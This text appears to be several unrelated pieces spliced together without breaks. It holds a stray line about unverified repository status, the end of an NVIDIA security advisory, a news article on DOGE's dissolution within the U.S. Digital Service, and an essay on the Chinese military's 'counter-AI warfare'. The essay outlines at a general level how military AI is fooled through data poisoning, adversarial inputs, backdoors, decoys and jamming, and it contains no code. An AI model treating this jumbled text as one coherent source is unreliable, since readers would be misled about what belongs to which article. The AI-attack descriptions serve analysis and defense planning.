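Treat UNKNOWN and NOT_A_REPO as unverified rather than safe: both mean the deployment's code version has to be established some other way.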
NVIDIA’s Product Security Incident Response Team (PSIRT) continues monitoring for exploitation attempts.
The vulnerabilities were responsibly disclosed by Peter Girnus of Trend Micro Zero Day Initiative, highlighting the importance of coordinated vulnerability research.
For comprehensive information, visit NVIDIA’s Product Security page to access complete Security alerts and subscribe to future vulnerability notifications.
The Department of Government Efficiency, a cornerstone of the second Trump administration's efforts to remake the federal government, no longer exists as a "centralized entity," according to the head of the government’s personnel agency.
But the longstanding White House technology team that President Donald Trump used to house DOGE continues to work on technology modernization projects throughout federal agencies.
The administration’s head of the Office of Personnel Management, Scott Kupor, told Reuters that DOGE “doesn’t exist” anymore, and posted on X that DOGE doesn’t have “centralized leadership” within the U.S. DOGE Service, though he did clarify that its principles “remain alive and well.” Fox News also reported that the centralized office for DOGE is closed.
Trump used an existing, Obama-era technology unit in the White House to establish the controversial cost-cutting unit on day one of his administration in January, installing DOGE within what was then the U.S. Digital Service and renaming it the U.S. DOGE Service.
The Trump executive order establishing DOGE also set up a "temporary organization” within USDS with a pre-set dissolution date on July 4, 2026.
DOGE made headlines throughout the spring for shutting down entire agencies, culling government contracts, getting rid of federal employees and accessing sensitive government systems.
But as Nextgov/FCW has reported before, the temporary organization and the USDS team that predated DOGE haven’t necessarily been working together, with the former taking on the controversial efficiency work and the other focusing on low-profile government modernization projects.
USDS still has about 50 employees, according to a source familiar with its operations who was not authorized to speak on the record. In July, the service was looking for new hires.
A shutdown plan for the White House, updated in October, also referenced 45 DOGE employees, which likely also refers to those working at USDS. The temporary DOGE organization had only one or two people left as of recent months, according to the source familiar.
The team that predated DOGE continues to work on user experience and modernization projects at agencies like the departments of Veterans Affairs and State, the General Services Administration and the Centers for Medicare and Medicaid Services. These efforts are in line with the work of the U.S. Digital Service pre-DOGE, said the source familiar.
The USDS accounts also posted that “the executive order establishing U.S. DOGE Service (USDS) is still in effect,” calling the Reuters story “misinformation” on X and LinkedIn Monday.
“USDS is still partnering with agencies to modernize federal technology and software to maximize governmental efficiency and productivity,” the post continued, the words written out over a photo of the popular internet doge meme associated with Dogecoin cryptocurrency and the administration’s efficiency team. The White House also told Nextgov/FCW that DOGE continues to be integrated into agencies.
“President Trump was given a clear mandate to reduce waste, fraud, and abuse across the federal government, and he continues to actively deliver on that commitment,” White House Assistant Press Secretary Liz Huston said in a statement.
Despite Kupor’s comments about a lack of centralized leadership for DOGE, the team’s acting administrator, Amy Gleason, does appear to still be at USDS.
It is true that much has changed about DOGE since the spring.
Billionaire Elon Musk initially led DOGE, but he stepped away from the effort in May only to have a public feud with Trump. Many DOGE staffers followed the Tesla CEO out the door, while others have taken on appointments and leadership roles in agencies.
One DOGE associate, Joe Gebbia, is now heading an entirely new White House “America by Design” initiative.
The news about DOGE becoming more dispersed isn’t necessarily a surprise.
In early June, the director of the Office of Management and Budget, Russell Vought, told lawmakers that the vision for DOGE was for it to become more "institutionalized" within agencies as “in-house consultants,” and that the leadership of DOGE was “decentralized” and with agency heads.
Either way, the DOGE ethos appears to still be a priority for the administration, which began layoff proceedings for 4,000 federal employees during the recent shutdown, a move a court eventually paused and Congress later reversed as part of the funding provision to reopen the government.
OPM and the Office of Management and Budget are institutionalizing the cost-cutting unit’s “principles,” the head of OPM wrote on X, linking to a blog about a recent executive order that set out new requirements for agencies on headcount and hiring.
OPM has “not taken on new responsibilities,” an OPM spokesperson told Nextgov/FCW, but continues “to prioritize efficiency in the federal workforce in line with the president’s priorities.”
A mask of darkness had fallen over the Gobi Desert training grounds at Zhurihe when the Blue Force unleashed a withering strike intended to wipe Red Force artillery off the map. Plumes rose from “destroyed” batteries as the seemingly successful fire plan took out its targets in waves. But it had all been a trap.
When Blue began to shift positions to avoid counter-battery fire, exercise control called a halt—and revealed that, far from defeating the enemy, more than half of Blue’s fire units had already been destroyed. After the exercise, the Red commander explained the ruse: he had salted the range with decoy guns and what he called “professional stand-ins,” the signatures of units and troops, which not only tricked Blue’s sensors and AI-assisted targeting into shooting at phantoms, but also revealed their own firing points.
It was just one example of how China’s military is building for a battlefield where humans and AI seek not just to fight, but fool each other.
Under the banner of “counter-AI warfare”, the People’s Liberation Army is teaching troops to fight the model as much as the soldier. Forces are learning to alter how vehicles appear to cameras, radar, and heat sensors so the AI misidentifies them, to feed junk or poisoned data into an opponent’s pipeline, and to swamp battlefield computers with noise. Leaders are drilling their own teams to spot when their own machines are wrong. The goal is simple: make an enemy’s military AI chase phantoms and miss the real threat.
The PLA conceives its counter-AI playbook as a triad that targets data, algorithms, and computing power. In May, PLA Daily described the concept in its Intelligentized Warfare Panorama series. It argued that the most reliable way to “break intelligence” is to hit all three at once.
First, counter-data operations inject junk data, skew what the sensors see, slip in corrupted examples, and reshape a vehicle’s radar, heat, and visual signals with coatings and emitters that mimic another platform’s profile and even engine vibration to mislead AI-assisted ISR. Second, counter-algorithm operations take advantage of model weak spots with logic tricks and crafted inputs, confusing AIs by breaking their “reward” signals and leading them to waste time in fruitless searches. Finally, attacks on computing power include “hard-kill” kinetic and cyber strikes on data centers and links, and “soft-kill” saturation attacks that flood the battlespace with electromagnetic noise, tying down scarce computing resources and clogging decision loops. A 2024 study by PLA researchers lists soft-kill techniques such as data pollution, reversal, backdoor insertion, and adversarial attacks that manipulate machine learning models.
Commentary from PLA analysts casts the contest as algorithm-versus-algorithm in joint operations. It urges planners to defeat enemy algorithms by testing how the algorithms make decisions, scrambling the signals that guide drone swarms, and maneuvering in unexpected ways to throw off the patterns those systems are trained to favor, with the aim of tricking enemy sensors and models into misidentifying targets.
In sum, instead of fearing an enemy’s use of AI, the PLA defines the adversary’s AI as a target set, and assigns work to hit each part.
The PLA is already putting these ideas into action. In August 2023, an Air Force UAV regiment added “real and fake targets” to target-unmasking drills, forcing pilots to sort decoys from real targets. Similarly, PLA air-defense training now treats ultra-low-altitude penetration as a priority, with studies framing the fight as the meeting point of decoys, deceptive signatures, and AI-aided or intelligent recognition. In the maritime arena, a 2024 study builds a framework for unmanned underwater vehicles to detect and ignore acoustic decoys when attacking a surface vessel.
PLA writers also give sustained attention to the human half of the team. In April, PLA Daily warned that commanders can slide into technology dependency and amplify bias baked into training data. The remedy is training commanders to judge when to trust the AI and when to overrule it by adding deception scenarios to simulations and running human and machine war games so operators practice spotting bad advice and overriding it. Follow-on commentary argued for “cognitive consistency” between operator and tool. In this model, wargames embed adversary behavior and develop rapid courses of action so instructors can see when officers override a wrong algorithm and explain why.
Human-in-the-loop command remains the baseline, with humans continuing to play the role of operator, fail-safe, and moral arbiter. Lt. Gen. He Lei echoed this view in 2024, urging tight limits on wartime AI and insisting that life-and-death authority stay with humans. Recent guidance adds rules for how units collect, label, and track data from start to finish, and those rules feed training scenarios, post-exercise reviews, and performance scores.
Industry’s role
Reflecting this growth in PLA thinking, Chinese companies have also begun to market counter-AI products in the categories of physical deception, electronic warfare, and software. Huaqin Technology markets multispectral camouflage that hides radar, infrared, and visual signatures. Yangzhou Spark offers camouflage nets and suits, stealth coatings, radar-absorbing materials, smoke generators, signature simulators, and radar reflectors. JX Gauss advertises inflatable, full-scale radar-vehicle decoys with remote-controlled moving parts. Together, these products support the counter-data playbook by changing how vehicles appear to radar, infrared, and visual sensors, planting convincing decoys, and tricking AI-enabled surveillance into locking onto the wrong signals.
Electronic-warfare vendors jam communications links and network connections, following the PLA’s soft-kill computing resources concept. Saturating the spectrum with clutter and false signals forces the enemy’s AI and limited computing power to waste time and resources, while friendly forces maintain a clear picture. Chengdu M&S Electronics lists gear that generates false target signals, fields radar decoy rounds, and provides simulators that play back hostile radar and communications signals to confuse receivers. Balu Electronics sells communications-jamming simulators that build complex electromagnetic environments and drive multi-target interference.
Meanwhile, Chinese tech firms are developing counter-AI software. Tencent Cloud runs a large-model red-team program and offers tools that monitor and lock down model inputs and outputs to block prompt injection, tainted data, and leaks. Qi’anxin’s model protection fence and GPT-Guard add tools that simulate attacks and watch inputs and outputs for tampering, and RealAI’s RealSafe automatically builds test cases that try to fool models and checks how well they hold up. Marketed as defense, these tools also sharpen tradecraft for pressuring an opponent’s algorithms.
U.S. response
U.S. planners need not look to China to understand that they must assume their AI will be contested in future battles. The PLA’s work in this space reflects the lessons from Ukraine, where deception operations have taken on a new level of importance in a battlefield saturated with sensors. It also heightens the concern of a growing “deception gap,” where if the U.S. military and its partners cannot master today’s emerging tools, they may fall behind in a critical field.
Answering that playbook begins with structured red-teaming and rigorous test and evaluation, not just one-off demos. The U.S. already has building blocks, including DARPA’s GARD on adversarial robustness, IARPA’s TrojAI on backdoor detection, NIST’s AI Risk Management Framework for evaluation and risk controls, and DOT&E guidance for continuous test and evaluation across the enterprise. Planners must harden pipelines and models by protecting data provenance, detecting anomalies, preserving safe fallbacks, and monitoring model health in the field.
Keeping humans decisively on top of the loop remains essential and is codified in DoD Directive 3000.09 on autonomy in weapons. Units should also upgrade the opposing forces they train against, giving them AI-enabled reconnaissance and deception kits and ensuring that “real and fake” targets are part of every major exercise.
Failure to do so will mean that the American military’s enthusiastic embrace of AI leads not to new advantages, but new vulnerabilities and even loss in this crucial new aspect of warfare.